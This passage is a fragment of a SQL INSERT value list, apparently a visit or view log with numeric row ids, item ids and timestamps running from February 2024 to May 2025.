23:20:10'),(85799,4930,1,'2024-02-21','2024-02-21 04:28:21'),(85800,470,1,'2024-02-21','2024-02-21 04:58:25'),(85801,3787,1,'2024-02-21','2024-02-21 05:13:18'),(85802,4416,1,'2024-02-21','2024-02-21 05:14:48'),(85803,4944,1,'2024-02-21','2024-02-21 05:56:10'),(85804,473,1,'2024-02-21','2024-02-21 07:49:23'),(85805,474,1,'2024-02-21','2024-02-21 07:49:25'),(85806,4457,1,'2024-02-21','2024-02-21 08:01:28'),(85807,1596,1,'2024-02-21','2024-02-21 08:09:44'),(85808,68,1,'2024-02-21','2024-02-21 08:10:17'),(85809,1598,1,'2024-02-21','2024-02-21 08:11:20'),(85810,1870,1,'2024-02-21','2024-02-21 08:37:03'),(85811,473,1,'2024-02-21','2024-02-21 08:37:05'),(85812,3261,1,'2024-02-21','2024-02-21 10:13:22'),(85813,5071,1,'2024-02-21','2024-02-21 10:54:42'),(85814,68,1,'2024-02-21','2024-02-21 11:54:55'),(85815,108,1,'2024-02-21','2024-02-21 11:55:35'),(85816,74,1,'2024-02-21','2024-02-21 11:56:34'),(85817,3269,1,'2024-02-21','2024-02-21 12:05:36'),(85818,4966,1,'2024-02-21','2024-02-21 13:16:14'),(85819,4938,1,'2024-02-21','2024-02-21 14:28:58'),(85820,1600,1,'2024-02-21','2024-02-21 14:37:32'),(85821,5163,1,'2024-02-21','2024-02-21 16:03:46'),(85822,1544,1,'2024-02-21','2024-02-21 16:06:52'),(85823,1586,1,'2024-02-21','2024-02-21 16:07:53'),(85824,3675,1,'2024-02-21','2024-02-21 17:05:44'),(85825,4944,1,'2024-02-21','2024-02-21 17:50:45'),(85826,1596,1,'2024-02-21','2024-02-21 21:14:49'),(85827,5050,1,'2024-02-21','2024-02-21 21:20:12'),(85828,5163,1,'2024-02-21','2024-02-21 21:29:14'),(85829,5163,1,'2024-02-21','2024-02-21 22:03:38'),(85830,5163,1,'2024-02-21','2024-02-21 22:04:34'),(85831,106,1,'2024-02-21','2024-02-21 22:17:32'),(85832,4938,1,'2024-02-21','2024-02-21 23:25:13'),(85833,4966,1,'2024-02-21','2024-02-21 23:35:29'),(85834,4382,1,'2024-02-22','2024-02-22 01:11:41'),(85835,1582,1,'2024-02-22','2024-02-22 03:29:46'),(85836,4944,1,'2024-02-22','2024-02-22 03:52:12'),(85837,4765,1,'2024-02-22','2024-02-22 04:22:24'),(85838,2159,1,'2024-02-22','2024-02-22 05:02:47'),(85839,1594,1,'2024-02-22','2024-02-22 05:38:33'),(85840,3710,1,'2024-02-22','2024-02-22 05:45:09'),(85841,4416,1,'2024-02-22','2024-02-22 05:55:27'),(85842,76,1,'2024-02-22','2024-02-22 07:01:38'),(85843,68,1,'2024-02-22','2024-02-22 07:01:43'),(85844,1596,1,'2024-02-22','2024-02-22 07:21:47'),(85845,80,1,'2024-02-22','2024-02-22 07:25:42'),(85846,473,1,'2024-02-22','2024-02-22 07:37:25'),(85847,2457,1,'2024-02-22','2024-02-22 09:32:38'),(85848,3706,1,'2024-02-22','2024-02-22 09:34:42'),(85849,1596,1,'2024-02-22','2024-02-22 12:31:35'),(85850,1778,1,'2024-02-22','2024-02-22 13:15:39'),(85851,4654,1,'2024-02-22','2024-02-22 16:20:33'),(85852,3265,1,'2024-02-22','2024-02-22 16:22:19'),(85853,5271,1,'2024-02-22','2024-02-22 16:31:57'),(85854,4357,1,'2024-02-22','2024-02-22 16:33:39'),(85855,470,1,'2024-02-22','2024-02-22 16:44:49'),(85856,4524,1,'2024-02-22','2024-02-22 16:55:07'),(85857,4663,1,'2024-02-22','2024-02-22 17:16:50'),(85858,5295,1,'2024-02-22','2024-02-22 17:39:19'),(85859,5037,1,'2024-02-22','2024-02-22 17:47:37'),(85860,5353,1,'2024-02-22','2024-02-22 18:01:48'),(85861,4744,1,'2024-02-22','2024-02-22 18:36:30'),(85862,5276,1,'2024-02-22','2024-02-22 18:48:12'),(85863,5276,1,'2024-02-22','2024-02-22 19:18:58'),(85864,5292,1,'2024-02-22','2024-02-22 20:48:56'),(85865,470,1,'2024-02-23','2024-02-23 00:44:33'),(85866,471,1,'2024-02-23','2024-02-23 02:14:31'),(85867,68,1,'2024-02-23','2024-02-23 02:41:43'),(85868,72,1,'2024-02-23','2024-02-23 02:46:35'),(85869,3069,1,'2024-02-23','2024-02-23 03:04:55'),(85870,4938,1,'2024-02-23','2024-02-23 03:30:35'),(85871,1612,1,'2024-02-23','2024-02-23 03:45:35'),(85872,4963,1,'2024-02-23','2024-02-23 04:00:36'),(85873,5005,1,'2024-02-23','2024-02-23 04:04:28'),(85874,4960,1,'2024-02-23','2024-02-23 04:34:55'),(85875,4357,1,'2024-02-23','2024-02-23 04:44:33'),(85876,80,1,'2024-02-23','2024-02-23 05:54:12'),(85877,68,1,'2024-02-23','2024-02-23 05:54:18'),(85878,108,1,'2024-02-23','2024-02-23 05:54:22'),(85879,4944,1,'2024-02-23','2024-02-23 06:30:57'),(85880,1780,1,'2024-02-23','2024-02-23 10:27:40'),(85881,473,1,'2024-02-23','2024-02-23 10:33:15'),(85882,1877,1,'2024-02-23','2024-02-23 10:33:15'),(85883,2297,1,'2024-02-23','2024-02-23 10:54:20'),(85884,2964,1,'2024-02-23','2024-02-23 13:21:38'),(85885,1877,1,'2024-02-23','2024-02-23 14:13:37'),(85886,473,1,'2024-02-23','2024-02-23 14:13:38'),(85887,1614,1,'2024-02-23','2024-02-23 14:23:57'),(85888,5001,1,'2024-02-23','2024-02-23 15:36:49'),(85889,1602,1,'2024-02-23','2024-02-23 16:57:34'),(85890,3781,1,'2024-02-23','2024-02-23 17:10:01'),(85891,4357,1,'2024-02-23','2024-02-23 18:06:38'),(85892,3781,1,'2024-02-23','2024-02-23 21:14:40'),(85893,3781,1,'2024-02-23','2024-02-23 21:23:20'),(85894,3781,1,'2024-02-23','2024-02-23 22:22:42'),(85895,4396,1,'2024-02-23','2024-02-23 22:38:21'),(85896,4944,1,'2024-02-23','2024-02-23 23:17:45'),(85897,1768,1,'2024-02-23','2024-02-23 23:31:47'),(85898,1596,1,'2024-02-24','2024-02-24 00:19:44'),(85899,108,1,'2024-02-24','2024-02-24 01:05:00'),(85900,3290,1,'2024-02-24','2024-02-24 02:07:54'),(85901,3781,1,'2024-02-24','2024-02-24 04:23:37'),(85902,4357,1,'2024-02-24','2024-02-24 05:18:28'),(85903,1586,1,'2024-02-24','2024-02-24 05:30:51'),(85904,2964,1,'2024-02-24','2024-02-24 05:53:14'),(85905,470,1,'2024-02-24','2024-02-24 06:00:43'),(85906,1594,1,'2024-02-24','2024-02-24 06:17:44'),(85907,3781,1,'2024-02-24','2024-02-24 09:58:31'),(85908,1612,1,'2024-02-24','2024-02-24 10:28:08'),(85909,3004,1,'2024-02-24','2024-02-24 10:34:00'),(85910,4341,1,'2024-02-24','2024-02-24 11:01:57'),(85911,1592,1,'2024-02-24','2024-02-24 14:07:28'),(85912,3781,1,'2024-02-24','2024-02-24 19:22:25'),(85913,470,1,'2024-02-24','2024-02-24 20:34:36'),(85914,1745,1,'2024-02-24','2024-02-24 20:48:29'),(85915,4357,1,'2024-02-24','2024-02-24 22:04:16'),(85916,4944,1,'2024-02-24','2024-02-24 23:47:59'),(85917,1592,1,'2024-02-25','2024-02-25 04:01:05'),(85918,3781,1,'2024-02-25','2024-02-25 04:49:23'),(85919,5163,1,'2024-02-25','2024-02-25 07:11:10'),(85920,5163,1,'2024-02-25','2024-02-25 07:11:12'),(85921,5128,1,'2024-02-25','2024-02-25 10:43:16'),(85922,4566,1,'2024-02-25','2024-02-25 11:53:00'),(85923,4357,1,'2024-02-25','2024-02-25 12:16:04'),(85924,570,1,'2024-02-25','2024-02-25 12:51:08'),(85925,473,1,'2024-02-25','2024-02-25 13:15:14'),(85926,2457,1,'2024-02-25','2024-02-25 13:51:25'),(85927,473,1,'2024-02-25','2024-02-25 14:00:23'),(85928,72,1,'2024-02-25','2024-02-25 14:24:26'),(85929,72,1,'2024-02-25','2024-02-25 14:24:38'),(85930,1582,1,'2024-02-25','2024-02-25 15:23:08'),(85931,1592,1,'2024-02-25','2024-02-25 15:57:57'),(85932,1877,1,'2024-02-25','2024-02-25 16:13:19'),(85933,473,1,'2024-02-25','2024-02-25 16:13:19'),(85934,68,1,'2024-02-25','2024-02-25 17:31:36'),(85935,91,1,'2024-02-25','2024-02-25 17:32:33'),(85936,4448,1,'2024-02-25','2024-02-25 17:36:40'),(85937,91,1,'2024-02-25','2024-02-25 17:37:57'),(85938,4428,1,'2024-02-25','2024-02-25 17:40:38'),(85939,91,1,'2024-02-25','2024-02-25 17:41:11'),(85940,4542,1,'2024-02-25','2024-02-25 17:42:41'),(85941,91,1,'2024-02-25','2024-02-25 17:43:52'),(85942,4440,1,'2024-02-25','2024-02-25 17:44:50'),(85943,91,1,'2024-02-25','2024-02-25 17:45:36'),(85944,4966,1,'2024-02-25','2024-02-25 19:22:16'),(85945,2904,1,'2024-02-25','2024-02-25 19:23:14'),(85946,2904,1,'2024-02-25','2024-02-25 19:25:13'),(85947,2395,1,'2024-02-25','2024-02-25 20:06:03'),(85948,5157,1,'2024-02-25','2024-02-25 20:33:01'),(85949,470,1,'2024-02-25','2024-02-25 21:52:19'),(85950,2420,1,'2024-02-25','2024-02-25 23:22:49'),(85951,4357,1,'2024-02-26','2024-02-26 00:37:17'),(85952,4938,1,'2024-02-26','2024-02-26 01:16:59'),(85953,4551,1,'2024-02-26','2024-02-26 04:37:35'),(85954,470,1,'2024-02-26','2024-02-26 05:37:24'),(85955,3280,1,'2024-02-26','2024-02-26 06:26:21'),(85956,5163,1,'2024-02-26','2024-02-26 08:32:00'),(85957,5163,1,'2024-02-26','2024-02-26 08:32:56'),(85958,3694,1,'2024-02-26','2024-02-26 08:37:33'),(85959,473,1,'2024-02-26','2024-02-26 09:03:25'),(85960,1870,1,'2024-02-26','2024-02-26 09:03:25'),(85961,1582,1,'2024-02-26','2024-02-26 10:07:03'),(85962,5076,1,'2024-02-26','2024-02-26 12:00:59'),(85963,5071,1,'2024-02-26','2024-02-26 12:01:09'),(85964,5259,1,'2024-02-26','2024-02-26 12:01:18'),(85965,4377,1,'2024-02-26','2024-02-26 12:01:28'),(85966,4587,1,'2024-02-26','2024-02-26 12:01:38'),(85967,4377,1,'2024-02-26','2024-02-26 12:01:56'),(85968,1722,1,'2024-02-26','2024-02-26 12:55:52'),(85969,89,1,'2024-03-08','2024-03-08 11:10:13'),(85970,89,1,'2024-03-08','2024-03-08 11:10:43'),(85971,1614,1,'2024-03-08','2024-03-08 11:11:01'),(85972,89,1,'2024-03-08','2024-03-08 11:11:25'),(85973,2965,1,'2024-03-08','2024-03-08 11:12:00'),(85974,89,1,'2024-03-08','2024-03-08 11:12:14'),(85975,4301,1,'2024-03-08','2024-03-08 11:12:51'),(85976,89,1,'2024-03-08','2024-03-08 11:13:16'),(85977,91,1,'2024-07-28','2024-07-28 02:02:21'),(85978,72,1,'2024-07-28','2024-07-28 02:03:14'),(85979,91,1,'2025-05-07','2025-05-07 15:45:56'),(85980,91,1,'2025-05-07','2025-05-07 15:47:37'),(85981,4668,1,'2025-05-07','2025-05-07 22:08:37'),(85982,91,1,'2025-05-07','2025-05-07 22:08:58'),(85983,4668,1,'2025-05-07','2025-05-07 22:10:54'),(85984,1741,1,'2025-05-08','2025-05-08 00:53:51'),(85985,5397,1,'2025-05-08','2025-05-08 04:41:42'),(85986,5359,1,'2025-05-08','2025-05-08 04:42:41'),(85987,5400,1,'2025-05-08','2025-05-08 04:48:05'),(85988,5397,1,'2025-05-08','2025-05-08 05:24:44'),(85989,5353,1,'2025-05-08','2025-05-08 06:42:53'),(85990,5397,1,'2025-05-08','2025-05-08 08:24:42'),(85991,91,1,'2025-05-08','2025-05-08 08:25:05'),(85992,89,1,'2025-05-08','2025-05-08 08:29:38'),(85993,1544,1,'2025-05-08','2025-05-08 08:29:57'),(85994,91,1,'2025-05-08','2025-05-08 09:39:07'),(85995,4546,1,'2025-05-08','2025-05-08 09:42:51'),(85996,5400,1,'2025-05-08','2025-05-08 09:47:29'),(85997,74,1,'2025-05-08','2025-05-08 09:49:57'),(85998,5356,1,'2025-05-08','2025-05-08 09:53:53'),(85999,5157,1,'2025-05-08','2025-05-08 10:02:04'),(86000,68,1,'2025-05-08','2025-05-08 10:28:21'),(86001,76,1,'2025-05-08','2025-05-08 10:37:18'),(86002,76,1,'2025-05-08','2025-05-08 10:42:33'),(86003,76,1,'2025-05-08','2025-05-08 10:47:11'),(86004,4930,1,'2025-05-08','2025-05-08 11:45:03'),(86005,5334,1,'2025-05-08','2025-05-08 11:45:48'),(86006,80,1,'2025-05-08','2025-05-08 11:48:55'),(86007,5334,1,'2025-05-08','2025-05-08 11:49:11'),(86008,89,1,'2025-05-08','2025-05-08 11:53:41'),(86009,4963,1,'2025-05-08','2025-05-08 12:00:30'),(86010,4980,1,'2025-05-08','2025-05-08 12:28:50'),(86011,4546,1,'2025-05-08','2025-05-08 12:47:32'),(86012,471,1,'2025-05-08','2025-05-08 13:11:57'),(86013,108,1,'2025-05-08','2025-05-08 13:35:55'),(86014,469,1,'2025-05-08','2025-05-08 13:38:20'),(86015,4941,1,'2025-05-08','2025-05-08 14:59:21'),(86016,5268,1,'2025-05-08','2025-05-08 17:13:20'),(86017,470,1,'2025-05-08','2025-05-08 17:14:47'),(86018,2410,1,'2025-05-08','2025-05-08 17:19:31'),(86019,4938,1,'2025-05-08','2025-05-08 17:29:17'),(86020,4938,1,'2025-05-08','2025-05-08 17:32:04'),(86021,472,1,'2025-05-08','2025-05-08 17:52:13'),(86022,472,1,'2025-05-08','2025-05-08 18:15:11'),(86023,472,1,'2025-05-08','2025-05-08 18:36:14'),(86024,102,1,'2025-05-08','2025-05-08 18:59:46'),(86025,102,1,'2025-05-08','2025-05-08 19:00:48'),(86026,5256,1,'2025-05-08','2025-05-08 19:09:55'),(86027,4950,1,'2025-05-08','2025-05-08 19:43:47'),(86028,3498,1,'2025-05-08','2025-05-08 20:02:44'),(86029,4966,1,'2025-05-08','2025-05-08 21:33:04'),(86030,76,1,'2025-05-08','2025-05-08 22:48:09'),(86031,5400,1,'2025-05-08','2025-05-08 23:08:51'),(86032,5397,1,'2025-05-08','2025-05-08 23:51:01'),(86033,5397,1,'2025-05-09','2025-05-09 00:02:04'),(86034,3691,1,'2025-05-09','2025-05-09 01:08:10'),(86035,3691,1,'2025-05-09','2025-05-09 01:19:13'),(86036,335,1,'2025-05-09','2025-05-09 01:26:53'),(86037,335,1,'2025-05-09','2025-05-09 01:29:18'),(86038,3691,1,'2025-05-09','2025-05-09 01:34:57'),(86039,5397,1,'2025-05-09','2025-05-09 01:52:07'),(86040,3691,1,'2025-05-09','2025-05-09 02:04:43'),(86041,3691,1,'2025-05-09','2025-05-09 03:00:34'),(86042,4771,1,'2025-05-09','2025-05-09 03:33:46'),(86043,91,1,'2025-05-09','2025-05-09 05:37:16'),(86044,3531,1,'2025-05-09','2025-05-09 06:05:30'),(86045,3742,1,'2025-05-09','2025-05-09 06:08:49'),(86046,3489,1,'2025-05-09','2025-05-09 06:32:52'),(86047,4660,1,'2025-05-09','2025-05-09 08:13:13'),(86048,4663,1,'2025-05-09','2025-05-09 08:53:13'),(86049,5125,1,'2025-05-09','2025-05-09 09:11:00'),(86050,2804,1,'2025-05-09','2025-05-09 09:34:49'),(86051,5304,1,'2025-05-09','2025-05-09 09:46:42'),(86052,3486,1,'2025-05-09','2025-05-09 10:48:47'),(86053,4660,1,'2025-05-09','2025-05-09 11:02:56'),(86054,3534,1,'2025-05-09','2025-05-09 11:44:55'),(86055,3297,1,'2025-05-09','2025-05-09 13:13:13'),(86056,2503,1,'2025-05-09','2025-05-09 13:21:10'),(86057,3714,1,'2025-05-09','2025-05-09 13:39:22'),(86058,4747,1,'2025-05-09','2025-05-09 13:40:00'),(86059,3482,1,'2025-05-09','2025-05-09 14:18:40'),(86060,3482,1,'2025-05-09','2025-05-09 14:20:29'),(86061,4744,1,'2025-05-09','2025-05-09 14:32:09'),(86062,3127,1,'2025-05-09','2025-05-09 15:18:03'),(86063,5101,1,'2025-05-09','2025-05-09 15:19:48'),(86064,2748,1,'2025-05-09','2025-05-09 17:25:08'),(86065,5310,1,'2025-05-09','2025-05-09 20:01:21'),(86066,3710,1,'2025-05-09','2025-05-09 22:22:41'),(86067,3124,1,'2025-05-10','2025-05-10 05:10:40'),(86068,3127,1,'2025-05-10','2025-05-10 06:21:19'),(86069,89,1,'2025-05-10','2025-05-10 07:56:26'),(86070,89,1,'2025-05-10','2025-05-10 07:56:37'),(86071,4301,1,'2025-05-10','2025-05-10 08:01:53'),(86072,5397,1,'2025-05-10','2025-05-10 09:10:04'),(86073,4301,1,'2025-05-10','2025-05-10 15:32:38'),(86074,2150,1,'2025-05-10','2025-05-10 21:22:31'),(86075,5400,1,'2025-05-10','2025-05-10 21:43:46'),(86076,335,1,'2025-05-10','2025-05-10 21:57:16'),(86077,4677,1,'2025-05-11','2025-05-11 08:29:01'),(86078,4960,1,'2025-05-11','2025-05-11 09:08:28'),(86079,5301,1,'2025-05-11','2025-05-11 09:09:29'),(86080,3727,1,'2025-05-11','2025-05-11 09:09:34'),(86081,5320,1,'2025-05-11','2025-05-11 09:09:49'),(86082,4960,1,'2025-05-11','2025-05-11 09:10:58'),(86083,3023,1,'2025-05-11','2025-05-11 09:11:40'),(86084,4645,1,'2025-05-11','2025-05-11 09:12:17'),(86085,5280,1,'2025-05-11','2025-05-11 09:12:53'),(86086,3531,1,'2025-05-11','2025-05-11 09:12:56'),(86087,4645,1,'2025-05-11','2025-05-11 09:13:57'),(86088,3731,1,'2025-05-11','2025-05-11 09:14:59'),(86089,4635,1,'2025-05-11','2025-05-11 09:15:17'),(86090,4674,1,'2025-05-11','2025-05-11 09:16:00'),(86091,3034,1,'2025-05-11','2025-05-11 09:17:02'),(86092,3027,1,'2025-05-11','2025-05-11 09:17:14'),(86093,4510,1,'2025-05-11','2025-05-11 09:17:29'),(86094,3705,1,'2025-05-11','2025-05-11 09:17:45'),(86095,3249,1,'2025-05-11','2025-05-11 09:18:03'),(86096,4753,1,'2025-05-11','2025-05-11 09:19:16'),(86097,3282,1,'2025-05-11','2025-05-11 09:19:57'),(86098,4566,1,'2025-05-11','2025-05-11 09:20:44'),(86099,3023,1,'2025-05-11','2025-05-11 09:21:03'),(86100,5400,1,'2025-05-11','2025-05-11 09:21:12'),(86101,4651,1,'2025-05-11','2025-05-11 09:21:19'),(86102,5001,1,'2025-05-11','2025-05-11 09:21:26'),(86103,3175,1,'2025-05-11','2025-05-11 09:22:03'),(86104,4744,1,'2025-05-11','2025-05-11 09:22:13'),(86105,4988,1,'2025-05-11','2025-05-11 09:22:21'),(86106,4768,1,'2025-05-11','2025-05-11 09:23:25'),(86107,5128,1,'2025-05-11','2025-05-11 09:25:23'),(86108,3027,1,'2025-05-11','2025-05-11 09:25:28'),(86109,4569,1,'2025-05-11','2025-05-11 09:25:43'),(86110,3724,1,'2025-05-11','2025-05-11 09:26:24'),(86111,5001,1,'2025-05-11','2025-05-11 09:27:26'),(86112,4733,1,'2025-05-11','2025-05-11 09:27:28'),(86113,4637,1,'2025-05-11','2025-05-11 09:29:16'),(86114,5397,1,'2025-05-11','2025-05-11 09:29:40'),(86115,3788,1,'2025-05-11','2025-05-11 09:30:06'),(86116,4785,1,'2025-05-11','2025-05-11 09:30:19'),(86117,5119,1,'2025-05-11','2025-05-11 09:30:42'),(86118,4651,1,'2025-05-11','2025-05-11 09:31:35'),(86119,3027,1,'2025-05-11','2025-05-11 09:31:58'),(86120,4980,1,'2025-05-11','2025-05-11 09:32:20'),(86121,106,1,'2025-05-11','2025-05-11 09:34:55'),(86122,4556,1,'2025-05-11','2025-05-11 09:35:59'),(86123,5343,1,'2025-05-11','2025-05-11 09:36:40'),(86124,4498,1,'2025-05-11','2025-05-11 09:37:09'),(86125,4738,1,'2025-05-11','2025-05-11 09:37:33'),(86126,3438,1,'2025-05-11','2025-05-11 09:38:01'),(86127,3030,1,'2025-05-11','2025-05-11 09:38:40'),(86128,3486,1,'2025-05-11','2025-05-11 09:39:34'),(86129,3788,1,'2025-05-11','2025-05-11 09:39:36'),(86130,5356,1,'2025-05-11','2025-05-11 09:39:48'),(86131,4329,1,'2025-05-11','2025-05-11 09:40:26'),(86132,2993,1,'2025-05-11','2025-05-11 09:40:31'),(86133,3735,1,'2025-05-11','2025-05-11 09:41:33'),(86134,1745,1,'2025-05-11','2025-05-11 09:43:11'),(86135,3680,1,'2025-05-11','2025-05-11 09:43:13'),(86136,481,1,'2025-05-11','2025-05-11 09:43:59'),(86137,2178,1,'2025-05-11','2025-05-11 09:44:04'),(86138,5323,1,'2025-05-11','2025-05-11 09:44:40'),(86139,4492,1,'2025-05-11','2025-05-11 09:44:53'),(86140,4776,1,'2025-05-11','2025-05-11 09:46:18'),(86141,1739,1,'2025-05-11','2025-05-11 09:46:24'),(86142,4648,1,'2025-05-11','2025-05-11 09:46:49'),(86143,3251,1,'2025-05-11','2025-05-11 09:47:14'),(86144,5289,1,'2025-05-11','2025-05-11 09:47:54'),(86145,4489,1,'2025-05-11','2025-05-11 09:49:24'),(86146,5289,1,'2025-05-11','2025-05-11 09:50:11'),(86147,1770,1,'2025-05-11','2025-05-11 09:50:41'),(86148,2419,1,'2025-05-11','2025-05-11 09:50:58'),(86149,3273,1,'2025-05-11','2025-05-11 09:51:21'),(86150,1732,1,'2025-05-11','2025-05-11 09:51:39'),(86151,3267,1,'2025-05-11','2025-05-11 09:53:04'),(86152,3710,1,'2025-05-11','2025-05-11 09:55:25'),(86153,4797,1,'2025-05-11','2025-05-11 09:57:59'),(86154,1606,1,'2025-05-11','2025-05-11 09:58:18'),(86155,2156,1,'2025-05-11','2025-05-11 09:59:09'),(86156,3705,1,'2025-05-11','2025-05-11 09:59:18'),(86157,3675,1,'2025-05-11','2025-05-11 09:59:39'),(86158,2989,1,'2025-05-11','2025-05-11 10:00:16'),(86159,5343,1,'2025-05-11','2025-05-11 10:00:57'),(86160,1604,1,'2025-05-11','2025-05-11 10:01:37'),(86161,4832,1,'2025-05-11','2025-05-11 10:03:03'),(86162,4733,1,'2025-05-11','2025-05-11 10:03:15'),(86163,4582,1,'2025-05-11','2025-05-11 10:04:06'),(86164,4950,1,'2025-05-11','2025-05-11 10:04:20'),(86165,5054,1,'2025-05-11','2025-05-11 10:04:29'),(86166,3280,1,'2025-05-11','2025-05-11 10:04:33'),(86167,3269,1,'2025-05-11','2025-05-11 10:04:50'),(86168,5378,1,'2025-05-11','2025-05-11 10:05:24'),(86169,3585,1,'2025-05-11','2025-05-11 10:05:41'),(86170,4785,1,'2025-05-11','2025-05-11 10:05:49'),(86171,2420,1,'2025-05-11','2025-05-11 10:06:41'),(86172,3675,1,'2025-05-11','2025-05-11 10:06:44'),(86173,4677,1,'2025-05-11','2025-05-11 10:07:50'),(86174,1770,1,'2025-05-11','2025-05-11 10:08:59'),(86175,1770,1,'2025-05-11','2025-05-11 10:09:16'),(86176,1737,1,'2025-05-11','2025-05-11 10:09:39'),(86177,4870,1,'2025-05-11','2025-05-11 10:10:15'),(86178,3267,1,'2025-05-11','2025-05-11 10:10:33'),(86179,4648,1,'2025-05-11','2025-05-11 10:10:40'),(86180,1734,1,'2025-05-11','2025-05-11 10:14:26'),(86181,4494,1,'2025-05-11','2025-05-11 10:16:39'),(86182,4878,1,'2025-05-11','2025-05-11 10:17:08'),(86183,3273,1,'2025-05-11','2025-05-11 10:17:24'),(86184,5020,1,'2025-05-11','2025-05-11 10:17:38'),(86185,4238,1,'2025-05-11','2025-05-11 10:19:05'),(86186,5371,1,'2025-05-11','2025-05-11 10:20:15'),(86187,2420,1,'2025-05-11','2025-05-11 10:20:25'),(86188,4612,1,'2025-05-11','2025-05-11 10:20:33'),(86189,3707,1,'2025-05-11','2025-05-11 10:20:55'),(86190,3259,1,'2025-05-11','2025-05-11 10:21:50'),(86191,4508,1,'2025-05-11','2025-05-11 10:22:10'),(86192,5005,1,'2025-05-11','2025-05-11 10:22:46'),(86193,3102,1,'2025-05-11','2025-05-11 10:23:16'),(86194,5033,1,'2025-05-11','2025-05-11 10:24:59'),(86195,3055,1,'2025-05-11','2025-05-11 10:25:48'),(86196,1734,1,'2025-05-11','2025-05-11 10:26:02'),(86197,5374,1,'2025-05-11','2025-05-11 10:26:07'),(86198,3269,1,'2025-05-11','2025-05-11 10:26:13'),(86199,4591,1,'2025-05-11','2025-05-11 10:26:16'),(86200,1737,1,'2025-05-11','2025-05-11 10:26:33'),(86201,4387,1,'2025-05-11','2025-05-11 10:27:08'),(86202,4837,1,'2025-05-11','2025-05-11 10:28:00'),(86203,4591,1,'2025-05-11','2025-05-11 10:28:33'),(86204,4508,1,'2025-05-11','2025-05-11 10:30:30'),(86205,1741,1,'2025-05-11','2025-05-11 10:31:38'),(86206,2971,1,'2025-05-11','2025-05-11 10:32:48'),(86207,4897,1,'2025-05-11','2025-05-11 10:34:02'),(86208,4842,1,'2025-05-11','2025-05-11 10:34:05'),(86209,1707,1,'2025-05-11','2025-05-11 10:34:16'),(86210,5383,1,'2025-05-11','2025-05-11 10:34:46'),(86211,1709,1,'2025-05-11','2025-05-11 10:35:08'),(86212,4591,1,'2025-05-11','2025-05-11 10:35:53'),(86213,1709,1,'2025-05-11','2025-05-11 10:36:26'),(86214,1768,1,'2025-05-11','2025-05-11 10:36:36'),(86215,4391,1,'2025-05-11','2025-05-11 10:38:18'),(86216,4489,1,'2025-05-11','2025-05-11 10:38:25'),(86217,3175,1,'2025-05-11','2025-05-11 10:39:01'),(86218,3680,1,'2025-05-11','2025-05-11 10:39:28'),(86219,3791,1,'2025-05-11','2025-05-11 10:39:38'),(86220,3704,1,'2025-05-11','2025-05-11 10:39:48'),(86221,4569,1,'2025-05-11','2025-05-11 10:40:06'),(86222,3251,1,'2025-05-11','2025-05-11 10:40:24'),(86223,3056,1,'2025-05-11','2025-05-11 10:41:14'),(86224,4440,1,'2025-05-11','2025-05-11 10:42:30'),(86225,1709,1,'2025-05-11','2025-05-11 10:42:40'),(86226,1730,1,'2025-05-11','2025-05-11 10:44:11'),(86227,4627,1,'2025-05-11','2025-05-11 10:44:22'),(86228,2395,1,'2025-05-11','2025-05-11 10:44:48'),(86229,4797,1,'2025-05-11','2025-05-11 10:44:57'),(86230,4508,1,'2025-05-11','2025-05-11 10:45:12'),(86231,3585,1,'2025-05-11','2025-05-11 10:46:31'),(86232,1739,1,'2025-05-11','2025-05-11 10:46:43'),(86233,4738,1,'2025-05-11','2025-05-11 10:48:01'),(86234,3180,1,'2025-05-11','2025-05-11 10:50:08'),(86235,1592,1,'2025-05-11','2025-05-11 10:50:19'),(86236,4717,1,'2025-05-11','2025-05-11 10:51:00'),(86237,2410,1,'2025-05-11','2025-05-11 10:51:21'),(86238,1730,1,'2025-05-11','2025-05-11 10:51:46'),(86239,4639,1,'2025-05-11','2025-05-11 10:53:33'),(86240,4448,1,'2025-05-11','2025-05-11 10:53:45'),(86241,5005,1,'2025-05-11','2025-05-11 10:54:58'),(86242,4391,1,'2025-05-11','2025-05-11 10:55:56'),(86243,110,1,'2025-05-11','2025-05-11 10:56:54'),(86244,3788,1,'2025-05-11','2025-05-11 10:58:01'),(86245,4332,1,'2025-05-11','2025-05-11 10:58:12'),(86246,3097,1,'2025-05-11','2025-05-11 10:58:14'),(86247,4494,1,'2025-05-11','2025-05-11 10:59:04'),(86248,110,1,'2025-05-11','2025-05-11 11:01:25'),(86249,1604,1,'2025-05-11','2025-05-11 11:01:51'),(86250,4494,1,'2025-05-11','2025-05-11 11:02:29'),(86251,481,1,'2025-05-11','2025-05-11 11:06:55'),(86252,1707,1,'2025-05-11','2025-05-11 11:10:54'),(86253,3706,1,'2025-05-11','2025-05-11 11:14:44'),(86254,4608,1,'2025-05-11','2025-05-11 11:16:39'),(86255,4440,1,'2025-05-11','2025-05-11 11:18:58'),(86256,4440,1,'2025-05-11','2025-05-11 11:23:46'),(86257,3698,1,'2025-05-11','2025-05-11 11:25:14'),(86258,3063,1,'2025-05-11','2025-05-11 11:31:39'),(86259,4627,1,'2025-05-11','2025-05-11 11:39:03'),(86260,4576,1,'2025-05-11','2025-05-11 11:40:48'),(86261,4520,1,'2025-05-11','2025-05-11 11:43:57'),(86262,5295,1,'2025-05-11','2025-05-11 11:44:08'),(86263,2419,1,'2025-05-11','2025-05-11 11:44:16'),(86264,1703,1,'2025-05-11','2025-05-11 11:46:24'),(86265,4963,1,'2025-05-11','2025-05-11 11:48:52'),(86266,5113,1,'2025-05-11','2025-05-11 11:50:38'),(86267,4344,1,'2025-05-11','2025-05-11 11:50:43'),(86268,4963,1,'2025-05-11','2025-05-11 11:51:08'),(86269,4573,1,'2025-05-11','2025-05-11 11:51:15'),(86270,68,1,'2025-05-11','2025-05-11 11:51:33'),(86271,4344,1,'2025-05-11','2025-05-11 11:52:53'),(86272,2956,1,'2025-05-11','2025-05-11 11:58:05'),(86273,4344,1,'2025-05-11','2025-05-11 11:58:07'),(86274,3181,1,'2025-05-11','2025-05-11 12:02:32'),(86275,3181,1,'2025-05-11','2025-05-11 12:10:12'),(86276,4654,1,'2025-05-11','2025-05-11 12:12:09'),(86277,4709,1,'2025-05-11','2025-05-11 12:13:07'),(86278,4971,1,'2025-05-11','2025-05-11 12:14:01'),(86279,4642,1,'2025-05-11','2025-05-11 12:18:28'),(86280,4561,1,'2025-05-11','2025-05-11 12:27:15'),(86281,3261,1,'2025-05-11','2025-05-11 12:27:41'),(86282,5116,1,'2025-05-11','2025-05-11 12:37:48'),(86283,5346,1,'2025-05-11','2025-05-11 12:38:54'),(86284,3787,1,'2025-05-11','2025-05-11 